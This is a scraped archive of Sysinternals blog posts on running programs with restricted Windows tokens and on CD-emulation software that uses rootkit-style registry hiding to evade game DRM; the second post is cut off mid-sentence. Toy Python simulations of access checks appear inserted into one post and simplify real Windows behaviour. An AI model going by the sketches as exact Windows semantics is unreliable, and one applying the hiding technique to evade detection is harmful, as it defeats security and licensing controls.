<BR /> <BR /> I’m still researching Vista User Account Control and so will blog on that in the near future. <BR /> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 3/27/2006 3:52:00 PM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:27:48 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-mysterious-driver/ba-p/723516 TechCommunityAPIAdmin 2019-06-27T06:27:48Z Running as Limited User - the Easy Way https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/running-as-limited-user-the-easy-way/ba-p/723506 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 02, 2006 </STRONG> <BR /> Malware has grown to epidemic proportions in the last few years. Despite applying layered security principles, including running antivirus, antispyware, and a firewall, even a careful user can fall victim to malware. Malware-infected downloads, drive-by exploits of Internet Explorer (IE) vulnerabilities, and a careless click on an Outlook attachment sent by a friend can render a system unusable and lead to several hours with the Windows setup CD and application installers. <BR /> <BR /> As <A href="#" mce_href="#" target="_blank"> this eWeek study </A> shows, one of the most effective ways to keep a system free from malware and to avoid reinstalls even if malware happens to sneak by, is to run as a limited user (a member of the Windows Users group). The vast majority of Windows users run as members of the Administrators group simply because so many operations, such as installing software and printers, changing power settings, and changing the time zone require administrator rights. Further, many applications fail when run in a limited-user account because they’re poorly written and expect to have write access to directories such as \Program Files and \Windows or registry keys under HKLM\Software. 
<BR /> <BR /> An alternative to running as limited user is to instead run as a limited user only the Internet-facing applications that are at greater risk of compromise, such as IE and Outlook. Microsoft promises this capability in Windows Vista with <A href="#" mce_href="#" target="_blank"> Protected-Mode IE </A> and User Account Control (UAC), but you can achieve a form of this today on Windows 2000 and higher with the new limited user execution features of Process Explorer and PsExec. <BR /> <BR /> Process Explorer’s Run as Limited User menu item in the File menu opens a dialog that looks like and acts like the standard Windows Run dialog, but that runs the target process without administrative privileges: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482370/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482370/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120931i164A5B57B9C3D435" /> <BR /> <BR /> PsExec with the -l switch accomplishes the same thing from the command line: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482371/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482371/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120932i1107318A68C3BA50" /> <BR /> <BR /> An advantage to using PsExec to launch limited-user processes is that you can create PsExec desktop shortcuts for ones you commonly launch. To make a shortcut for Outlook, for example, right-click on the desktop, choose New-&gt;Shortcut, enter the path to PsExec in the location field and click Next. Enter Outlook as the name of the shortcut and press Finish. 
Then right-click on the shortcut to open its properties and add "-l -d" and the path to Outlook (e.g. C:\Program Files\Microsoft Office\Office11\Outlook.exe) to the text in the Target field. Finally, select Change Icon, navigate to the Outlook executable and choose the first icon. Activating the shortcut will result in a Command Prompt window briefly appearing as PsExec launches the target with limited rights. <BR /> <BR /> Both Process Explorer and PsExec use the <A href="#" mce_href="#" target="_blank"> CreateRestrictedToken </A> API to create a security context, called a token, that’s a stripped-down version of its own, removing administrative privileges and group membership. After generating a token that looks like one that Windows assigns to standard users, Process Explorer calls CreateProcessAsUser to launch the target process with the new token. <BR /> <BR /> You can use Process Explorer itself to compare the token of a process running with full administrative rights and one that’s limited by viewing the Security tab in the Process Properties dialog. The properties on the left are for an instance of IE running in an account with administrative group membership and the one on the right for IE launched using Run as Limited User: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482372/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482372/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120933i9E01D5322DDB0993" /> <BR /> <BR /> The privilege lists immediately stand out as different because the limited-user token has so few privileges. Process Explorer queries the privileges assigned to the Users group and strips out all other privileges, including powerful ones like SeDebugPrivilege, SeLoadDriverPrivilege and SeRestorePrivilege. 
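<BR /> <BR /> The stripping step is easy to picture with a toy model. The Python below is only a sketch under stated assumptions: the Token class, the restrict function, and the sample privilege sets are invented for illustration, and none of it calls the real CreateRestrictedToken or CreateProcessAsUser APIs. It keeps only the privileges also present in an allowed set, and moves disabled groups into a separate deny-only set, the flag examined next.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Token:
    """Toy stand-in for a Windows token (illustrative, not the real layout)."""
    user: str
    groups: frozenset                     # groups usable to grant or deny access
    deny_only: frozenset = frozenset()    # groups usable only to deny access
    privileges: frozenset = frozenset()


def restrict(token, groups_to_disable, allowed_privileges):
    """Return a stripped-down copy of token, in the spirit of CreateRestrictedToken."""
    disabled = token.groups & frozenset(groups_to_disable)
    return Token(
        user=token.user,
        groups=token.groups - disabled,
        deny_only=token.deny_only | disabled,
        privileges=token.privileges & frozenset(allowed_privileges),
    )


# Assumed sample data: a handful of privileges an administrator might hold,
# and a small set standing in for what the Users group is assigned.
admin = Token(
    user="Mark",
    groups=frozenset({"Builtin\\Administrators", "Builtin\\Users"}),
    privileges=frozenset({
        "SeDebugPrivilege", "SeLoadDriverPrivilege", "SeRestorePrivilege",
        "SeChangeNotifyPrivilege", "SeShutdownPrivilege",
    }),
)
users_privileges = {"SeChangeNotifyPrivilege", "SeShutdownPrivilege"}

limited = restrict(admin, {"Builtin\\Administrators"}, users_privileges)
print(sorted(limited.privileges))
print(sorted(limited.deny_only))
```

The original token is left untouched and a new one is returned, which mirrors the way the restricted token is a separate object handed to the new process while the launching process keeps its own rights.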
<BR /> <BR /> The difference between the group lists is more subtle: both tokens contain the Builtin\Administrators group, but the group has a Deny flag in the limited-user version. Fully understanding the effect of that flag requires a quick background on the Windows security model. <BR /> <BR /> Windows stores an object’s permissions in a Discretionary Access Control List (DACL) that consists of zero or more Access Control Entries (ACEs). Each ACE specifies the user or group to which it applies, a type of Allow or Deny and the accesses (e.g. read, delete) it allows or denies. When a process tries to open an object Windows normally considers each ACE in the object’s DACL that matches the user or any of the groups in the process’ token. However, when the Deny flag is present on a group, that group is only used during a security access check to deny access to objects, never to grant access. <BR /> <BR /> CreateRestrictedToken marks groups you don’t want present in the resulting token with the Deny flag rather than removing them altogether to prevent the security hole doing so would create: a process using the new token could potentially access objects for which the removed groups have been explicitly denied access. Users would therefore be able to essentially bypass permissions by using the API. Consider a directory that has permissions denying the Builtin\Administrators account access, but allows Mark access. That directory wouldn’t be accessible by the original instance of IE above, but would be accessible by the limited-user version if the group were simply removed from its token. <BR /> <BR /> The result of running applications as limited user is that malware invoked by those applications won’t be able to modify system settings, disable antivirus or antispyware, install device drivers, or configure themselves in system-wide autostart locations. 
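<BR /> <BR /> The directory example can be worked through with a small simulation of the access check. This is a simplified sketch, not the Windows algorithm in full: the access_check function, the tuple layout of an ACE, and the single "read" access are assumptions made for illustration, and details such as NULL DACLs, inheritance, and owner rights are left out. ACEs are evaluated in order, and a deny-only group can match a Deny ACE but never an Allow ACE.

```python
ALLOW, DENY = "allow", "deny"


def access_check(user, groups, deny_only_groups, dacl, wanted):
    """Walk the DACL in order and report whether `wanted` access is granted."""
    grant_sids = {user} | set(groups)               # may match Allow and Deny ACEs
    deny_sids = grant_sids | set(deny_only_groups)  # deny-only groups match Deny ACEs only
    for ace_type, sid, accesses in dacl:
        if wanted not in accesses:
            continue
        if ace_type == DENY and sid in deny_sids:
            return False
        if ace_type == ALLOW and sid in grant_sids:
            return True
    return False  # no Allow ACE matched, so access is denied


# The directory from the text: Administrators are denied, Mark is allowed.
directory_dacl = [
    (DENY, "Builtin\\Administrators", {"read"}),
    (ALLOW, "Mark", {"read"}),
]

# Original IE instance: Administrators is an ordinary group in the token.
full_admin = access_check(
    "Mark", {"Builtin\\Administrators", "Builtin\\Users"}, set(),
    directory_dacl, "read")

# What CreateRestrictedToken does: the group stays, flagged deny-only.
deny_only = access_check(
    "Mark", {"Builtin\\Users"}, {"Builtin\\Administrators"},
    directory_dacl, "read")

# The hole that is avoided: the group removed from the token outright.
group_removed = access_check(
    "Mark", {"Builtin\\Users"}, set(),
    directory_dacl, "read")

print(full_admin, deny_only, group_removed)
```

Only the third case gets in, which is exactly the bypass the Deny flag exists to prevent: with the group flagged rather than dropped, the restricted process is refused just as the unrestricted one is.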
<BR /> <BR /> There are some limitations, however: because the limited-user processes are running in the same account and on the same desktop as other processes running with administrative privileges, sophisticated malware could potentially inject themselves into more privileged processes or remotely control them using Windows messages. When it comes to security, there’s no single cure all and every layer of protection you add could be the one that eventually saves you or your computer. <BR /> <BR /> Next post I’ll take a look inside Vista’s UAC to see how it uses the same approach as Process Explorer and PsExec, but leverages changes to the Windowing system and process object security model to better isolate limited-user processes from those running with higher privilege. <BR /> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 3/2/2006 10:29:00 AM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:27:23 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/running-as-limited-user-the-easy-way/ba-p/723506 TechCommunityAPIAdmin 2019-06-27T06:27:23Z Using Rootkits to Defeat Digital Rights Management https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/using-rootkits-to-defeat-digital-rights-management/ba-p/723502 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Feb 06, 2006 </STRONG> <BR /> The <A href="#" mce_href="#" target="_blank"> Sony rootkit debacle </A> highlighted the use of rootkits to prevent pirates and authors of CD burning, ripping, and emulation utilities from circumventing Digital Rights Management (DRM) restrictions on access to copyrighted content. It’s therefore ironic, though not surprising, that several CD burning and disc emulation utilities are also using rootkits, though the technology is being used in the opposite way: to prevent DRM software from enforcing copy restrictions. 
<BR /> <BR /> Because PC game CDs and DVDs do not need to be compatible with set-top players, software vendors can store data on media in unorthodox ways that require software support to read it. Attempts to make a copy of such media without the aid of the software result in a scrambled version and the software has DRM measures to detect and foil unauthorized copying. <BR /> <BR /> CD burning and emulation software companies owe a significant amount of their sales to customers that want to store games on their hard drives. The legitimate claim for doing this is that it enables fast, cached access to the game, though it is well known that this is also used to make illegal copies of games to share with friends, so content-protected CDs and DVDs present a challenge the companies can’t ignore. One way to deal with the problem is to re-engineer the software that interprets the data stored on the media, but that approach requires enormous and on-going resources dedicated to deciphering changes and enhancements made to the encoding schemes. <BR /> <BR /> An easier approach is to fool game DRM software into thinking it’s reading data for playing a game from its original CD rather than from an on-disk copy. DRM software uses a number of techniques to try to defeat that trick, but a straightforward one is simply to detect if CD emulation software is present on the system and if so, if the game is being run from an on-disk emulated copy. That’s where rootkits come in. Two of the most popular CD emulation utilities are <A href="#" mce_href="#" target="_blank"> Alcohol </A> and <A href="#" mce_href="#" target="_blank"> Daemon Tools </A> and they both use rootkits. <BR /> <BR /> Alcohol advertises itself as enabling you “to make a duplicate back-up to recordable media of nearly all your expensive Game/Software/DVD titles, and/or an image that can be mounted and run from any one of Alcohol's virtual drives”. 
When you run a <A href="#" mce_href="#" target="_blank"> RootkitRevealer </A> scan of a system on which Alcohol is installed you see several discrepancies: <BR /> <BR /> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482319/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120921i7F7A9A073AEC9B02" /> <BR /> <BR /> The first two are data mismatches whereas the last one is a key that’s hidden from Windows. A data mismatch occurs when RootkitRevealer obtains a different value from a Registry API than it sees when it looks at the raw Registry data where the value resides. When you view either of the values in Regedit they appear to be composed of sequences of space characters: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482320/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482320/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120922iCFC5DC319093C84D" /> <BR /> <BR /> Why would Alcohol want to use data mismatching rather than the typical cloaking technique to hide the value altogether? The values in question are located in HKLM\Software\Classes\Installer\Products and HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall and both areas are where applications store information for use by the Windows Add/Remove Programs (ARP) utility. ARP uses the ProductName value in an application’s Products key as the name it displays in its list of installed applications so an empty value implies that we should see a product with no name in the list. 
However, a quick look shows that there are no missing names and we know that the value is associated with Alcohol, but it shows up in the list: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482321/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482321/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120923i24E0EDC0A349A633" /> <BR /> <BR /> Using <A href="#" mce_href="#" target="_blank"> Regmon </A> to capture a Registry activity trace of ARP, which as a Control Panel applet is implemented as a DLL hosted by Rundll32.exe, confirms that ARP reads the displayed Alcohol text from the mismatched ProductName value whereas Regedit sees only empty data for the same value: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482322/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482322/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120924i7901EFB80BFED9B0" /> <BR /> <BR /> The other mismatched value behaves the same way and it’s my guess that Alcohol disguises the strings that identify its presence on a system from anything but ARP in order to avoid detection by DRM software like that included in games that disable themselves in th